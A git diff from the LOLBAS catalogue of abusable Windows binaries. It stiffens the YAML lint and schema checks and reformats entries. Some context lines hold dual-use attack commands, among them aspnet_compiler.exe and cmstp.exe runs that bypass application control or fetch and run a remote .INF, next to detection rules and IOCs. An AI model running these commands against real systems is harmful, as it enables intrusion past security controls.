diff --git a/.github/.yamllint b/.github/.yamllint index 10d94dd..7452167 100644 --- a/.github/.yamllint +++ b/.github/.yamllint @@ -4,12 +4,12 @@ yaml-files: - '*.yml' rules: new-line-at-end-of-file: - level: warning + level: error trailing-spaces: - level: warning + level: error line-length: level: warning new-lines: - level: warning + level: error indentation: - level: warning + level: error diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml index 4e1a7c3..039ba1b 100644 --- a/.github/workflows/gh-pages.yml +++ b/.github/workflows/gh-pages.yml @@ -16,7 +16,7 @@ jobs: - name: Change .yml to .md run: | - for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done + for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done mv yml/OSBinaries yml/Binaries mv yml/OSLibraries yml/Libraries mv yml/OSScripts yml/Scripts diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 7b71b07..70d7678 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -1,19 +1,35 @@ --- -name: YAML Lint -on: - push: - branches: - - master - pull_request: - branches: - - master +name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks +on: [push,pull_request] jobs: lintFiles: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v1 + - uses: actions/checkout@v3 - name: yaml-lint uses: ibiqlik/action-yamllint@v3 with: + no_warnings: true + file_or_dir: yml/**/*.yml config_file: .github/.yamllint + - name: Validate OSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml diff --git a/.github/yaml-lint-reviewdog.yml.bak b/.github/yaml-lint-reviewdog.yml.bak new file mode 100644 index 0000000..500f25c --- /dev/null +++ b/.github/yaml-lint-reviewdog.yml.bak @@ -0,0 +1,35 @@ +--- +name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks +on: [pull_request] + +jobs: + lintFiles: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Run yamllint + uses: reviewdog/action-yamllint@v1 + with: + level: error + reporter: github-pr-review # Change reporter. + yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml' + - name: Validate OSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml index 5e5b5da..d6a530b 100644 --- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml +++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml index a95c37f..50c121b 100644 --- a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml +++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Bart Handle: '@bartblaze' ---- diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml index c6b5dc5..929443e 100644 --- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml +++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml @@ -15,4 +15,3 @@ Full_Path: - Path: '%localappdata%\Whatsapp\Update.exe' Detection: - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' ---- diff --git a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml index 2a93285..0ca821f 100644 --- a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml +++ b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml @@ -25,4 +25,3 @@ Acknowledgement: Handle: '@@vysecurity' - Person: Adam (Internals) Handle: '@Hexacorn' ---- diff --git a/YML-Schema.yml b/YML-Schema.yml new file mode 100644 index 0000000..dc3f775 --- /dev/null +++ b/YML-Schema.yml @@ -0,0 +1,118 @@ +--- +type: map +mapping: +# Id field enhancement possibility commenting out for now +# "Id": +# type: str +# required: true +# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}' + "Name": + type: str + required: true + "Description": + type: str + required: true + "Aliases": + type: seq + required: false + sequence: + - type: map + mapping: + "Alias": + type: str + required: false + "Author": + type: str + required: true + "Created": + type: date + required: true + "Commands": + type: seq + required: true + sequence: + - type: map + mapping: + "Command": + type: str + required: true + "Description": + type: str + required: true + "Usecase": + type: str + required: true + "Category": + type: str + required: true + enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload] + "Privileges": + type: str + required: true + "MitreID": + type: str + required: true + pattern: '^T[0-9]{4}(\.[0-9]{3})?$' + "OperatingSystem": + type: str + required: true + "Full_Path": + type: seq + required: true + sequence: + - type: map + mapping: + "Path": + type: str + required: true + "Code_Sample": + type: seq + required: false + sequence: + - type: map + mapping: + "Code": + type: str + "Detection": + type: seq + required: false + sequence: + - type: map + mapping: + "IOC": + type: str + "Sigma": + type: str + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + "Analysis": + type: str + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + "Elastic": + type: str + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + "Splunk": + type: str + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + "BlockRule": + type: str + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + "Resources": + type: seq + required: false + sequence: + - type: map + mapping: + "Link": + type: str + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' + "Acknowledgement": + type: seq + required: false + sequence: + - type: map + mapping: + "Person": + type: str + "Handle": + type: str + pattern: '^(@(\w){1,15})?$' diff --git a/YML-Template.yml b/YML-Template.yml index 8556fd6..ea4a2ac 100644 --- a/YML-Template.yml +++ b/YML-Template.yml @@ -6,6 +6,8 @@ Created: YYYY-MM-DD (date the person created this file) Commands: - Command: The command Description: Description of the command + Aliases: + - An alias for the command (example: ProcDump.exe & ProcDump64.exe) Usecase: A description of the usecase Category: Execute Privileges: Required privs diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index a7aa5b5..df1e405 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -20,4 +20,3 @@ Resources: Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ---- diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index dc4cf74..df6283e 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -1,28 +1,27 @@ ---- -Name: Aspnet_Compiler.exe -Description: ASP.NET Compilation Tool -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u - Description: Execute C# code with the Build Provider and proper folder structure in place. - Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 -Full_Path: - - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -Code_Sample: - - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml -Resources: - - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 -Acknowledgement: - - Person: cpl - Handle: '@cpl3h' ---- +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index c0b81bd..30df729 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -23,7 +23,7 @@ Detection: - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. Resources: - Link: https://freddiebarrsmith.com/at.txt - - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator + - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems Acknowledgement: - Person: 'Freddie Barr-Smith' @@ -34,4 +34,3 @@ Acknowledgement: Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ---- diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 45ffc5f..d04185e 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -14,17 +14,14 @@ Commands: Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe -Code_Sample: -- Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml - - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration - - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs - - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware + - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml + - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration + - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs + - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware Resources: - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 338a5d8..1a3a7b9 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -48,4 +48,3 @@ Acknowledgement: Handle: '@aionescu' - Person: Asif Matadar Handle: '@d1r4c' ---- diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 9a6f56b..a6f9a94 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -46,7 +46,7 @@ Detection: - IOC: bitsadmin creates new files - IOC: bitsadmin adds data to alternate data stream Resources: - - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 + - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: @@ -56,4 +56,3 @@ Acknowledgement: Handle: '@carnal0wnage' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index eb2328d..fc183f6 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Ensar Samil Handle: '@sblmsrsn' ---- diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index 2d60a37..5f42615 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ---- diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index be67802..2f937a5 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -75,4 +75,3 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Lior Adar ---- diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index c67db32..9501541 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -21,17 +21,14 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe -Code_Sample: -- Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - IOC: cmd.exe executing files from alternate data streams. - - IOC: cmd.exe creating/modifying file contents in an alternate data stream. + - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml + - IOC: cmd.exe executing files from alternate data streams. + - IOC: cmd.exe creating/modifying file contents in an alternate data stream. Resources: - Link: https://twitter.com/yeyint_mth/status/1143824979139579904 Acknowledgement: - Person: r0lan Handle: '@yeyint_mth' ---- diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 90ef75d..0192125 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -14,14 +14,11 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe -Code_Sample: -- Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml Resources: - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index 275827c..47a87c9 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 0f00d4e..1d34d11 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -14,24 +14,22 @@ Commands: - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AwL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe -Code_Sample: - - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml - - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - IOC: Execution of cmstp.exe without a VPN use case is suspicious - - IOC: DotNet CLR libraries loaded into cmstp.exe - - IOC: DotNet CLR Usage Log - cmstp.exe.log + - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml + - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml + - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml + - IOC: Execution of cmstp.exe without a VPN use case is suspicious + - IOC: DotNet CLR libraries loaded into cmstp.exe + - IOC: DotNet CLR Usage Log - cmstp.exe.log Resources: - Link: https://twitter.com/NickTyrer/status/958450014111633408 - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 @@ -44,4 +42,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Nick Tyrer Handle: '@NickTyrer' ---- diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index 286db84..a433c69 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -29,4 +29,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' ---- diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 0ed5c87..cc27bc7 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -24,4 +24,3 @@ Acknowledgement: Handle: '@hexacorn' - Person: Wietze Handle: '@wietze' ---- diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 148aa25..5e92572 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -15,16 +15,16 @@ Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - IOC: Control.exe executing files from alternate data streams - - IOC: Control.exe executing library file without cpl extension - - IOC: Suspicious network connections from control.exe + - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml + - IOC: Control.exe executing files from alternate data streams + - IOC: Control.exe executing library file without cpl extension + - IOC: Suspicious network connections from control.exe Resources: - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 44d7da9..53606f6 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -22,16 +22,15 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml - - IOC: Csc.exe should normally not run as System account unless it is used for development. + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml + - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml + - IOC: Csc.exe should normally not run as System account unless it is used for development. Resources: - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 7a09cee..3a7bbab 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -15,22 +15,21 @@ Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe Code_Sample: - - Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Cscript.exe executing files from alternate data streams - - IOC: DotNet CLR libraries loaded into cscript.exe - - IOC: DotNet CLR Usage Log - cscript.exe.log + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml + - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml + - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml + - Splunk: 